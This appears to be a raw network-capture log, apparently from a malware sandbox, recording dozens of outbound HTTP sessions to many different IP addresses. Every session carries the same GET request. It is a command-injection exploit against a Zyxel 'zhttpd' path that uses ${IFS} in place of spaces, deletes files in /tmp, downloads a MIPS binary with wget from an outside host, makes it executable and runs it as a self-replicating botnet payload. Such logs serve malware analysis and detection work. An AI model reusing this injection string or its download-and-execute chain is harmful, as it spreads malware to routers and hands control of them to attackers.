                                      Jan 14, 2024 15:51:02.686757088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8596192.168.2.144482668.102.148.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686783075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8597192.168.2.1449298209.185.209.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686805964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8598192.168.2.1445026126.137.187.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686846018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8599192.168.2.1452932221.138.55.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686889887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8600192.168.2.1458122160.127.16.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686923981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8601192.168.2.145703854.223.61.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686988115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8602192.168.2.1454588176.161.243.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687030077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8603192.168.2.1451614164.156.226.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687056065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8604192.168.2.1433570176.211.141.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687103987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8605192.168.2.146035070.12.54.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687129974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8606192.168.2.144830088.86.125.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687145948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8607192.168.2.1443352207.106.71.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687187910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8608192.168.2.145687432.98.115.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687242031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8609192.168.2.144032898.198.79.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687294006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8610192.168.2.1460074204.186.91.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687334061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8611192.168.2.1447344123.184.75.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687387943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8612192.168.2.145101068.12.59.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687422037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8613192.168.2.145597447.29.123.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687467098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8614192.168.2.145011486.208.160.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687510014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8615192.168.2.1453968212.86.200.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687546968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8616192.168.2.143985457.198.215.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687592030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8617192.168.2.143423464.232.27.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687628984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8618192.168.2.1433380173.112.177.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687681913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8619192.168.2.144560498.118.111.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687710047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8620192.168.2.143733273.135.138.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687757015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8621192.168.2.1441398145.71.29.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687804937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8622192.168.2.145487082.122.7.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687841892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8623192.168.2.1455784218.60.40.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687891960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8624192.168.2.1449864157.139.52.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687915087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8625192.168.2.1440740211.13.124.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.687949896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8626192.168.2.145355644.255.191.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688003063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8627192.168.2.1444496198.189.225.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688019037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8628192.168.2.144594095.26.196.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688064098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8629192.168.2.1459640137.182.58.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688114882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8630192.168.2.1459522198.220.30.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688142061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8631192.168.2.146019259.159.185.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688200951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8632192.168.2.1442824113.203.63.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688239098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8633192.168.2.1434858136.74.15.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688276052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8634192.168.2.146036220.207.117.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688322067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8635192.168.2.145791695.166.196.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688348055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8636192.168.2.1449362153.239.94.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688393116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8637192.168.2.1443920212.192.98.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688441038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8638192.168.2.1445486136.185.119.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688471079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8639192.168.2.144211424.24.24.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688538074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8640192.168.2.1441534183.253.61.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688564062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8641192.168.2.1460272160.199.180.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688602924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8642192.168.2.1452040195.214.88.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688635111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8643192.168.2.1437678204.130.145.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688661098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8644192.168.2.1458192104.147.245.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688705921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8645192.168.2.1456590154.126.124.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688724995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8646192.168.2.1448294212.32.248.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688766003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8647192.168.2.1448980196.211.182.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688807011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8648192.168.2.1433312145.154.251.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688858032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8649192.168.2.1449618120.193.122.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688893080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8650192.168.2.1446314210.96.42.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688931942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8651192.168.2.1446088211.61.159.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.688971043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8652192.168.2.144122261.139.73.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.689017057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8653192.168.2.1457176102.16.217.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.689043999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8654192.168.2.14547402.124.99.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.689096928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8655192.168.2.145131880.152.171.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.689151049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8656192.168.2.143934261.51.195.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.689187050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8657192.168.2.143724275.52.98.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.692836046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8658192.168.2.1447424188.32.12.169443
                                      TimestampBytes transferredDirectionData
